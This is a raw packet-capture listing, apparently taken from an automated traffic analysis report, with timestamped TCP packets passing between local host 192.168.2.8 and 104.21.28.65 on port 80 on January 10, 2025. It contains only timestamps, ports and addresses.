                                                                              Jan 10, 2025 18:54:21.819531918 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819552898 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.819600105 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819612026 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819632053 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819637060 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.819645882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819668055 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819678068 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.819680929 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.819701910 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.820406914 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820427895 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820441961 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820468903 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.820477962 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.820538998 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820550919 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820563078 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820580959 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.820589066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820602894 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820616007 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.820626974 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.820652008 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.821382046 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821396112 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821408987 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821427107 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.821486950 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821499109 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821511984 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821521997 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.821525097 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.821547985 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822412014 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822447062 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822460890 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822467089 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822480917 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822499037 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822590113 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822613001 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822623968 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822627068 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822653055 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822809935 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822870970 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822882891 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822905064 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822928905 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822942019 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822954893 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822964907 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.822969913 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.822992086 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.823072910 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823086023 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823107004 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.823792934 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823807001 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823822021 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823828936 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.823856115 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.823896885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823908091 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823920965 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823932886 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.823939085 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.823981047 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.824413061 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.824424982 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.824459076 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.860016108 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.860059023 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.860069990 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.860084057 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.860205889 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.940572023 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940639973 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940663099 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940676928 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940691948 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940711021 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940731049 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940743923 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940756083 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940813065 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.940865040 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.940895081 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940907955 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940922022 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940936089 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940948963 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.940970898 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940983057 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.940989017 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.940996885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941011906 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941015959 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941047907 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941056967 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941085100 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941096067 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941097975 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941137075 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941176891 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941194057 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941200018 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941211939 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941231966 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941265106 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941296101 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941382885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941395044 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941407919 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941420078 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941425085 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941457033 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941494942 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941508055 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941520929 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941533089 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941540956 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941560030 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941574097 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941615105 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941621065 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941631079 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941678047 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941699982 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941713095 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941740036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941751957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941754103 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941766977 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941790104 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941819906 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941860914 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941868067 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941874027 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941889048 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.941915035 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.941988945 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942002058 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942013979 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942029953 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942058086 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942068100 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942079067 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942111015 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942120075 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942126036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942164898 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942241907 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942255020 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942269087 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942281008 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942293882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942300081 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942326069 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942384005 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942397118 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942409039 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942434072 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942456961 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942483902 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942497015 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942508936 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942549944 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.942554951 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942567110 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.942599058 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.943650961 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947371960 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947419882 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947432041 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947441101 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947459936 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947483063 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947494984 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947508097 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947529078 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947557926 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947570086 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947597980 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947626114 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947638988 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947665930 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947685957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947698116 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947711945 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947726965 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947753906 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947774887 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947803020 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947839022 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947860956 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947874069 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947886944 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947911024 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.947943926 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947964907 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.947982073 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948041916 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948055029 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948067904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948081970 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948110104 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948225975 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948240042 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948252916 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948263884 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948277950 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948285103 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948297024 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948311090 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948311090 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948326111 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.948338985 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948365927 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.948379040 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.967467070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.967483997 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.967499018 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:21.967598915 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:21.967677116 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027430058 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027448893 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027472019 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027484894 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027507067 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027522087 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027534962 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027549028 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027559042 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027573109 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027590990 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027601957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027606964 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027618885 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027650118 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027683973 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027718067 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027724028 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027736902 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027754068 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027766943 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027767897 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027801037 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027883053 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027896881 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027909994 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027923107 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027929068 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027956963 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.027985096 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.027997971 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028028011 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028033018 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028047085 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028095007 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028112888 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028126001 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028140068 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028160095 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028253078 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028265953 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028279066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028289080 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028292894 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028307915 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028320074 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028345108 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028362989 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028422117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028434992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028455973 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028507948 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028521061 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028532982 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028547049 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028580904 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028594971 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028604031 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028634071 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028645992 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028657913 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028671980 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028701067 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028749943 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028764963 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028778076 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028789043 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028793097 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028815031 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028862953 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028903008 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.028913975 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028927088 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028938055 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.028959036 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029021978 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029035091 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029047012 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029059887 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029073000 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029073954 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029102087 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029130936 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029134989 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029181957 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029194117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029220104 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029289961 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029304028 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029318094 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029334068 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029341936 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029357910 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029422998 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029434919 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029463053 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029474974 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029486895 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029499054 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029506922 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029521942 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029544115 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.029622078 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029635906 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029648066 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.029660940 CET8049714104.21.28.65192.168.2.8
